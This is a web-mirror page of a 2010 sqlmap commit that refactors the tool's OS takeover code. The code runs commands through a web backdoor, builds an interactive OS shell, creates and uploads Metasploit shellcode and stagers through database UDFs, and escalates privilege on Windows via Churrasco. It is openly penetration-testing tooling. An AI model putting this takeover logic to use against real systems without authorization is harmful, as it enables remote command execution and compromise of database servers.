sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-03 05:04:11 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor code refactoring

Browse Source
This commit is contained in:
Bernardo Damele 2010-01-14 14:33:08 +00:00
parent 070ccc30e9
commit c9863bc1d2
3 changed files with 87 additions and 118 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
lib/takeover/abstraction.py
View File

@ -60,7 +60,7 @@ class Abstraction(Web, UDF, xp_cmdshell):
def execCmd(self, cmd, silent=False, forgeCmd=False): def execCmd(self, cmd, silent=False, forgeCmd=False):
if self.webBackdoorUrl and not kb.stackedTest: if self.webBackdoorUrl and not kb.stackedTest:
self.webBackdoorRunCmd(cmd, silent=True) self.webBackdoorRunCmd(cmd)
elif kb.dbms in ( "MySQL", "PostgreSQL" ): elif kb.dbms in ( "MySQL", "PostgreSQL" ):
self.udfExecCmd(cmd, silent=silent) self.udfExecCmd(cmd, silent=silent)
@ -73,7 +73,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
raise sqlmapUnsupportedFeatureException, errMsg raise sqlmapUnsupportedFeatureException, errMsg
def evalCmd(self, cmd, first=None, last=None): def evalCmd(self, cmd, first=None, last=None):
if kb.dbms in ( "MySQL", "PostgreSQL" ): if self.webBackdoorUrl and not kb.stackedTest:
return self.webBackdoorRunCmd(cmd)
elif kb.dbms in ( "MySQL", "PostgreSQL" ):
return self.udfEvalCmd(cmd, first, last) return self.udfEvalCmd(cmd, first, last)
elif kb.dbms == "Microsoft SQL Server": elif kb.dbms == "Microsoft SQL Server":
@ -103,25 +106,31 @@ class Abstraction(Web, UDF, xp_cmdshell):
if not conf.osShell and not conf.osPwn and not conf.cleanup: if not conf.osShell and not conf.osPwn and not conf.cleanup:
self.__cmdShellCleanup() self.__cmdShellCleanup()
def absOsShell(self): def shell(self):
if kb.dbms in ( "MySQL", "PostgreSQL" ): if self.webBackdoorUrl and not kb.stackedTest:
infoMsg = "going to use injected sys_eval and sys_exec " infoMsg = "calling OS shell. To quit type "
infoMsg += "user-defined functions for operating system " infoMsg += "'x' or 'q' and press ENTER"
infoMsg += "command execution"
logger.info(infoMsg)
elif kb.dbms == "Microsoft SQL Server":
infoMsg = "going to use xp_cmdshell extended procedure for "
infoMsg += "operating system command execution"
logger.info(infoMsg) logger.info(infoMsg)
else: else:
errMsg = "feature not yet implemented for the back-end DBMS" if kb.dbms in ( "MySQL", "PostgreSQL" ):
raise sqlmapUnsupportedFeatureException, errMsg infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg += "user-defined functions for operating system "
infoMsg += "command execution"
logger.info(infoMsg)
infoMsg = "calling %s OS shell. To quit type " % kb.os or "Windows" elif kb.dbms == "Microsoft SQL Server":
infoMsg += "'x' or 'q' and press ENTER" infoMsg = "going to use xp_cmdshell extended procedure for "
logger.info(infoMsg) infoMsg += "operating system command execution"
logger.info(infoMsg)
else:
errMsg = "feature not yet implemented for the back-end DBMS"
raise sqlmapUnsupportedFeatureException, errMsg
infoMsg = "calling %s OS shell. To quit type " % kb.os or "Windows"
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
autoCompletion(osShell=True) autoCompletion(osShell=True)

42
lib/takeover/web.py
View File

@ -53,7 +53,7 @@ class Web:
self.webUploaderUrl = None self.webUploaderUrl = None
self.webDirectories = set() self.webDirectories = set()
def webBackdoorRunCmd(self, cmd, silent=False): def webBackdoorRunCmd(self, cmd):
if self.webBackdoorUrl is None: if self.webBackdoorUrl is None:
return return
@ -66,49 +66,13 @@ class Web:
page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True) page, _ = Request.getPage(url=cmdUrl, direct=True, silent=True)
if page is not None: if page is not None:
output = re.search("<pre>(.+?)</pre>", page, re.I | re.S) output = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
if not silent:
if output: if output:
print output.group(1) output = output.group(1)
else:
print "No output"
return output return output
def webBackdoorShell(self):
if self.webBackdoorUrl is None:
return
infoMsg = "calling OS shell. To quit type "
infoMsg += "'x' or 'q' and press ENTER"
logger.info(infoMsg)
autoCompletion(osShell=True)
while True:
command = None
try:
command = raw_input("os-shell> ")
except KeyboardInterrupt:
print
errMsg = "user aborted"
logger.error(errMsg)
except EOFError:
print
errMsg = "exit"
logger.error(errMsg)
break
if not command:
continue
if command.lower() in ( "x", "q", "exit", "quit" ):
break
self.webBackdoorRunCmd(command)
def webFileUpload(self, fileToUpload, destFileName, directory): def webFileUpload(self, fileToUpload, destFileName, directory):
if self.webApi == "php": if self.webApi == "php":
multipartParams = { multipartParams = {

120
plugins/generic/takeover.py
View File

@ -84,10 +84,10 @@ class Takeover(Abstraction, Metasploit, Registry):
logger.info(infoMsg) logger.info(infoMsg)
self.webInit() self.webInit()
self.webBackdoorRunCmd(conf.osCmd)
else: else:
self.initEnv() self.initEnv()
self.runCmd(conf.osCmd)
self.runCmd(conf.osCmd)
def osShell(self): def osShell(self):
stackedTest() stackedTest()
@ -97,12 +97,14 @@ class Takeover(Abstraction, Metasploit, Registry):
logger.info(infoMsg) logger.info(infoMsg)
self.webInit() self.webInit()
self.webBackdoorShell()
else: else:
self.initEnv() self.initEnv()
self.absOsShell()
self.shell()
def osPwn(self): def osPwn(self):
goUdf = False
stackedTest() stackedTest()
if not kb.stackedTest: if not kb.stackedTest:
@ -116,77 +118,71 @@ class Takeover(Abstraction, Metasploit, Registry):
self.getRemoteTempPath() self.getRemoteTempPath()
self.createMsfPayloadStager() self.createMsfPayloadStager()
self.uploadMsfPayloadStager(web=True) self.uploadMsfPayloadStager(web=True)
else:
self.initEnv()
self.getRemoteTempPath()
self.pwn() if kb.dbms in ( "MySQL", "PostgreSQL" ):
msg = "how do you want to execute the Metasploit shellcode "
msg += "on the back-end database underlying operating system?"
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Stand-alone payload stager (file system way)"
return while True:
choice = readInput(msg, default=1)
self.initEnv() if isinstance(choice, str) and choice.isdigit() and int(choice) in ( 1, 2 ):
self.getRemoteTempPath() choice = int(choice)
break
goUdf = False elif isinstance(choice, int) and choice in ( 1, 2 ):
break
if kb.dbms in ( "MySQL", "PostgreSQL" ): else:
msg = "how do you want to execute the Metasploit shellcode " warnMsg = "invalid value, valid values are 1 and 2"
msg += "on the back-end database underlying operating system?" logger.warn(warnMsg)
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)"
msg += "\n[2] Stand-alone payload stager (file system way)"
while True: if choice == 1:
choice = readInput(msg, default=1) goUdf = True
if isinstance(choice, str) and choice.isdigit() and int(choice) in ( 1, 2 ): if goUdf:
choice = int(choice) self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed")
break else:
self.createMsfPayloadStager()
self.uploadMsfPayloadStager()
elif isinstance(choice, int) and choice in ( 1, 2 ): if kb.os == "Windows" and conf.privEsc:
break if kb.dbms == "MySQL":
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
else: elif kb.dbms == "PostgreSQL":
warnMsg = "invalid value, valid values are 1 and 2" warnMsg = "by default PostgreSQL on Windows runs as postgres "
warnMsg += "user which has no Windows Impersonation "
warnMsg += "Tokens: it is unlikely that the privilege "
warnMsg += "escalation will be successful"
logger.warn(warnMsg) logger.warn(warnMsg)
if choice == 1: elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
goUdf = True warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
warnMsg += "runs as Network Service which has no Windows "
if goUdf: warnMsg += "Impersonation Tokens within all threads, this "
self.createMsfShellcode(exitfunc="thread", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") warnMsg += "makes Meterpreter's incognito extension to "
else: warnMsg += "fail to list tokens"
self.createMsfPayloadStager()
self.uploadMsfPayloadStager()
if kb.os == "Windows" and conf.privEsc:
if kb.dbms == "MySQL":
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, no need to privilege escalate"
logger.debug(debugMsg)
elif kb.dbms == "PostgreSQL":
warnMsg = "by default PostgreSQL on Windows runs as postgres "
warnMsg += "user which has no Windows Impersonation "
warnMsg += "Tokens: it is unlikely that the privilege "
warnMsg += "escalation will be successful"
logger.warn(warnMsg)
elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
warnMsg += "runs as Network Service which has no Windows "
warnMsg += "Impersonation Tokens within all threads, this "
warnMsg += "makes Meterpreter's incognito extension to "
warnMsg += "fail to list tokens"
logger.warn(warnMsg)
uploaded = self.uploadChurrasco()
if not uploaded:
warnMsg = "beware that the privilege escalation "
warnMsg += "might not work"
logger.warn(warnMsg) logger.warn(warnMsg)
else: uploaded = self.uploadChurrasco()
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows if not uploaded:
conf.privEsc = False warnMsg = "beware that the privilege escalation "
warnMsg += "might not work"
logger.warn(warnMsg)
else:
# Unset --priv-esc if the back-end DBMS underlying operating
# system is not Windows
conf.privEsc = False
self.pwn(goUdf) self.pwn(goUdf)